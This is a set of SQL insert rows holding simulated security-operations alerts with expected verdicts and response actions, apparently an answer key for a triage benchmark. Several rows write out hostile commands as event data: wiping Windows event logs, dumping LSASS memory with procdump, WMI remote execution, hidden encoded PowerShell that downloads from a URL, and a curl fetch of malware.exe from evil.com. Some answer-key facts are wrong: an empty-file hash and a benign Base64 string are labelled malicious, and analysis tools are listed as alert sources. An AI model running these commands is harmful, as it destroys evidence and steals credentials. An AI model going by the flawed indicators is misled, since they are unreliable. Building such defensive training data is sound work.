(2152, 'Defensive Evasion Detected: Timestomping and Log Deletion', 'high', 'Carbon Black', 'Detected execution of a script performing timestomping and log deletion on critical systems, aimed at evading detection and obscuring attack traces.', 'Defensive Evasion', 'T1070.006', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:34:56Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.4.50\",\"dst_ip\":\"192.168.4.50\",\"username\":\"sysadmin\",\"hostname\":\"CORP-FILESERVER-01\",\"command_line\":\"cmd.exe /c del /f /q C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\* & copy /b +,,\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"cmd.exe /c del /f /q C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\* & copy /b +,,\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command indicative of log deletion and timestomping activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.4.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"defensive_evasion\",\"analysis_notes\":\"The use of commands to delete logs and modify timestamps is a clear indicator of defensive evasion tactics.\"}', 'Expert', 'EDR', 9, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2153, 'Fileless Malware Detected via PowerShell', 'critical', 'CrowdStrike', 'A sophisticated fileless malware attack was detected using obfuscated PowerShell scripts to execute payloads directly in memory. The attack involved credential dumping from LSASS.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:23:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.15\",\"username\":\"jdoe\",\"hostname\":\"CORP-DC1\",\"command_line\":\"powershell -nop -w hidden -e Y2FsY3VsYXRlLWNoZWNrc3Vt\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell -nop -w hidden -e Y2FsY3VsYXRlLWNoZWNrc3Vt\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Obfuscated PowerShell command used in fileless malware attacks\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malicious hash associated with credential dumping tools\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"This alert is a true positive due to the presence of obfuscated PowerShell commands and a known malicious hash used in credential dumping.\"}', 'Expert', 'EDR', 9, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2154, 'Lateral Movement Detected via WMI', 'high', 'SentinelOne', 'An attacker attempted lateral movement within the network using WMI. The activity was observed moving from a compromised host to a domain controller.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:56:32Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.105\",\"dst_ip\":\"192.168.1.20\",\"username\":\"hacker\",\"hostname\":\"COMPROMISED-PC\",\"command_line\":\"wmic /node:192.168.1.20 process call create calc.exe\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in lateral movement\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"wmic /node:192.168.1.20 process call create calc.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"WMI command execution indicative of lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"WMI commands originating from a compromised host attempting to execute processes on a domain controller indicate a true positive for lateral movement.\"}', 'Expert', 'EDR', 9, 1, 'TECH', NULL, NULL, NULL, 0),
(2155, 'Credential Dumping from LSASS Detected', 'critical', 'Carbon Black', 'An attacker executed a memory scraping tool to extract credentials from the LSASS process on a critical server.', 'Credential Access', 'T1003.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:15:22Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.50\",\"dst_ip\":\"192.168.2.10\",\"username\":\"admin\",\"hostname\":\"SERVER01\",\"command_line\":\"procdump64.exe -ma lsass.exe C:\\\\Windows\\\\Temp\\\\lsass.dmp\",\"file_hash\":\"6f5902ac237024bdd0c176cb93063dc4\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with credential dumping activity\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"procdump64.exe -ma lsass.exe C:\\\\Windows\\\\Temp\\\\lsass.dmp\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known memory dumping tool used to extract credentials from LSASS\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"6f5902ac237024bdd0c176cb93063dc4\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Malicious hash associated with credential theft tools\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The execution of a known memory dumping tool against the LSASS process on a server indicates a true positive for credential theft.\"}', 'Expert', 'EDR', 9, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2156, 'Multi-Hop C2 Communication via Slack', 'high', 'Sysmon', 'Detected multi-hop command and control communication using Slack channels. This technique leveraged legitimate services to evade detection.', 'Command and Control', 'T1102', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"198.51.100.3\",\"dst_ip\":\"10.0.0.5\",\"username\":\"malicious_user\",\"hostname\":\"INFECTED-HOST\",\"request_body\":\"POST /api/chat.postMessage HTTP/1.1\",\"domain\":\"slack.com\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.3\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in suspicious C2 activities\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"slack.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Legitimate domain used for C2 communications\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"POST /api/chat.postMessage HTTP/1.1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual Slack API usage for C2 communications\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"command_and_control\",\"analysis_notes\":\"The use of legitimate services such as Slack for C2 communications indicates a true positive, highlighting the need for enhanced monitoring.\"}', 'Expert', 'EDR', 9, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2157, 'Fast-Flux DNS with DGA Domain Detected', 'high', 'CrowdStrike', 'A fast-flux DNS network using a domain generated by a DGA was detected, indicating potential botnet activity.', 'Malware', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T18:30:10Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.62\",\"dst_ip\":\"172.16.0.2\",\"username\":\"bot\",\"hostname\":\"CLIENT-PC\",\"domain\":\"xj3k2l5o2d3a.com\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.62\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP frequently reported for hosting C2 infrastructure\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"xj3k2l5o2d3a.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Domain generated using DGA, part of a known fast-flux network\"}}],\"expected_actions\":[\"block_ip\",\"block_domain\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The detection of a fast-flux DNS network using a DGA domain suggests botnet activity and warrants immediate investigation.\"}', 'Expert', 'EDR', 9, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2158, 'Fileless Malware Execution via PowerShell Detected', 'critical', 'CrowdStrike', 'A sophisticated fileless malware attack was detected involving PowerShell and credential dumping from LSASS. Lateral movement was attempted via WMI.', 'Malware', 'T1086', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:22:35Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"203.0.113.89\",\"username\":\"jdoe\",\"hostname\":\"CORP-DC01\",\"command_line\":\"powershell.exe -nop -w hidden -enc WwBTAHkAcwB0AGUAbQAuAE4AZQBUAC4AVwBlAGIAQwBsAGkAZQBuAHQAXQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhAEMAbwBuAHQAZQBuAHQAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQBhAG4AZABhAG4AdABpAC4AYwBvAG0AIgApAA==\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network address used by compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.89\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 152 times for hosting C2 servers\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -nop -w hidden -enc WwBTAHkAcwB0AGUAbQAuAE4AZQBUAC4AVwBlAGIAQwBsAGkAZQBuAHQAXQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhAEMAbwBuAHQAZQBuAHQAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQBhAG4AZABhAG4AdABpAC4AYwBvAG0AIgApAA==\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicative of fileless malware\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"This alert is confirmed as true positive due to the presence of encoded PowerShell activity and communication with a known 
malicious IP.\"}', 'Expert', 'EDR', 9, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2159, 'Suspicious Network Activity Detected', 'high', 'Sysmon', 'Anomalous network connection identified from an internal system to an external IP.', 'Network Anomaly', 'T1049', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:47:22Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"203.0.113.100\",\"username\":\"mjackson\",\"hostname\":\"WORKSTATION-12\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network address used by employee workstation\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported 10 times for unusual activities\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_anomaly\",\"analysis_notes\":\"The alert was determined to be a false positive due to the lack of malicious intent in the network connection.\"}', 'Expert', 'EDR', 9, 1, 'TECH', NULL, NULL, NULL, 0),
(2160, 'Potential Brute Force Attack Detected', 'medium', 'SentinelOne', 'Multiple failed login attempts observed from an external IP, potentially indicating a brute force attack.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:15:47Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.75\",\"username\":\"admin\",\"hostname\":\"CORP-SERVER01\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.75\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported 25 times for failed login attempts\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"brute_force\",\"analysis_notes\":\"The alert is likely a false positive as the IP has a history of failed logins but no successful breaches recorded.\"}', 'Expert', 'EDR', 9, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2161, 'Unusual Email Activity Detected', 'medium', 'Carbon Black', 'A suspicious email with a potential phishing URL was detected, but no malicious content was found upon further inspection.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:32:10Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.56\",\"username\":\"rsmith\",\"hostname\":\"MAIL-SERVER01\",\"email_sender\":\"noreply@safe-email.com\",\"url\":\"http://safesite.com/login\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No malicious activity associated with this IP\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://safesite.com/login\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"URL is legitimate and safe\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email was sent from a legitimate domain with a clean URL, indicating a false positive.\"}', 'Expert', 'EDR', 9, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2162, 'Suspicious Web Request Detected - Potential XSS', 'high', 'CrowdStrike', 'A web request containing potential XSS payload was detected but was deemed non-malicious after analysis.', 'Web Attack', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:55:30Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.120\",\"dst_ip\":\"192.168.1.100\",\"username\":\"webuser\",\"hostname\":\"WEB-SERVER01\",\"request_body\":\"<script>alert(\'test\')</script>\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.120\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP flagged for suspicious web requests\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"<script>alert(\'test\')</script>\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Common test payload for XSS\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The detected XSS payload was a benign test string, confirming a false positive.\"}', 'Expert', 'EDR', 9, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2163, 'Packed Executable Detected with Suspicious Network Activity', 'high', 'Any.Run', 'A packed executable was detected attempting to connect to a known malicious IP address, indicative of C2 activity. Reverse engineering of the sample revealed suspicious strings.', 'Malware', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:34:56Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"198.51.100.23\",\"username\":\"jdoe\",\"hostname\":\"workstation-1\",\"command_line\":\"C:\\\\temp\\\\malware.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 activity\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with known malware family\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of a packed executable connecting to a known malicious IP confirms malicious activity.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2164, 'Suspicious Macro Detected in Email Attachment', 'critical', 'Cuckoo Sandbox', 'An email attachment with a malicious macro was executed, leading to the download of a secondary payload from a suspected phishing domain.', 'Malware', 'T1203', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:20:15Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.5\",\"dst_ip\":\"192.168.1.15\",\"username\":\"susan.smith\",\"hostname\":\"office-pc\",\"email_sender\":\"malicious@example.com\",\"url\":\"http://malicious-download.com/payload.exe\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP flagged for distributing malware\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-download.com/payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with phishing campaigns\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The execution of a malicious macro leading to a known phishing site confirms the malicious intent.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2165, 'Potential Malicious Macro Execution Detected', 'medium', 'Ghidra', 'A macro from a document appeared suspicious but analysis revealed it was a standard template used internally, falsely triggering the alert.', 'Malware', 'T1203', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:45:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"192.168.1.21\",\"username\":\"alice\",\"hostname\":\"alice-pc\",\"command_line\":\"C:\\\\Users\\\\alice\\\\Documents\\\\template_macro.docm\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"C:\\\\Users\\\\alice\\\\Documents\\\\template_macro.docm\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"File matches known safe internal templates\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The macro was part of a recognized internal document, leading to a false positive.\"}', 'Intermediate', 'MAL', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2166, 'Encoded Command Execution Detected', 'medium', 'IDA Pro', 'A Base64 encoded command was executed on a server, but further analysis showed it was a legitimate maintenance script.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:10:20Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.30\",\"dst_ip\":\"192.168.1.31\",\"username\":\"admin\",\"hostname\":\"server-01\",\"command_line\":\"powershell.exe -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0AYwBvAG0AbQBhAG4AZAAgACIAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACIA\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0AYwBvAG0AbQBhAG4AZAAgACIAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACIA\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command matches known maintenance procedure\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded command was part of a scheduled maintenance task, resulting in a false positive.\"}', 'Intermediate', 'MAL', 5, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2167, 'Malicious Payload Download Detected via Reverse Engineered Macro', 'critical', 'Cuckoo Sandbox', 'A document macro executed a script to download a malicious payload from a suspicious domain, indicating potential data exfiltration.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:55:40Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"203.0.113.75\",\"username\":\"mike\",\"hostname\":\"mike-desktop\",\"command_line\":\"curl http://download.evil.com/malware.exe\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP known for hosting malicious payloads\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"curl http://download.evil.com/malware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used to download malware\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The execution of a macro to download a payload from a known malicious domain confirms the attack.\"}', 'Intermediate', 'MAL', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2168, 'Packed Executable Detected with Malicious Intent', 'high', 'Cuckoo Sandbox', 'A packed executable was analyzed and determined to contain malicious code. The executable attempts to establish a connection to a known C2 server.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"45.76.89.112\",\"username\":\"jdoe\",\"hostname\":\"workstation-01\",\"command_line\":\"PEiD.exe /scan /deep C:\\\\malware\\\\packed.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.76.89.112\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1200 times for C2 activity\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash detected in 37 AV engines\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"PEiD.exe /scan /deep C:\\\\malware\\\\packed.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Command used for deep scanning packed executables\"}}],\"expected_actions\":[\"block_ip\",\"block_hash\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The C2 IP and file hash are known malicious indicators, confirming the malware presence.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2169, 'Suspicious Macro Execution in Word Document', 'medium', 'Any.Run', 'A Word document with an embedded macro was executed, leading to potential malware download activity.', 'Malware', 'T1156', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:50:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"203.0.113.100\",\"username\":\"asmith\",\"hostname\":\"laptop-02\",\"command_line\":\"winword.exe /macro C:\\\\Users\\\\asmith\\\\Documents\\\\invoice.docm\",\"file_hash\":\"9e107d9d372bb6826bd81d3542a419d6\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP linked to malicious document download\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"9e107d9d372bb6826bd81d3542a419d6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash found in 22 AV engines as malicious\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"winword.exe /macro C:\\\\Users\\\\asmith\\\\Documents\\\\invoice.docm\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Macro execution linked to document download\"}}],\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The macro execution led to a connection with a known malicious IP, confirming the attack.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2170, 'Encoded Malicious Command Execution Attempt', 'critical', 'IDA Pro', 'A Base64 encoded command was executed on a server, potentially indicating a script-based attack vector.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"192.168.1.30\",\"username\":\"rthomas\",\"hostname\":\"server-01\",\"command_line\":\"powershell.exe -enc U2V0LUV4ZWN1dGlvbkB0YXNrIC1jb21tYW5kICdzY3JpcHQn\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of source machine\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -enc U2V0LUV4ZWN1dGlvbkB0YXNrIC1jb21tYW5kICdzY3JpcHQn\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command linked to malicious script execution\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The Base64 encoded command is linked to known malicious script execution patterns.\"}', 'Intermediate', 'MAL', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
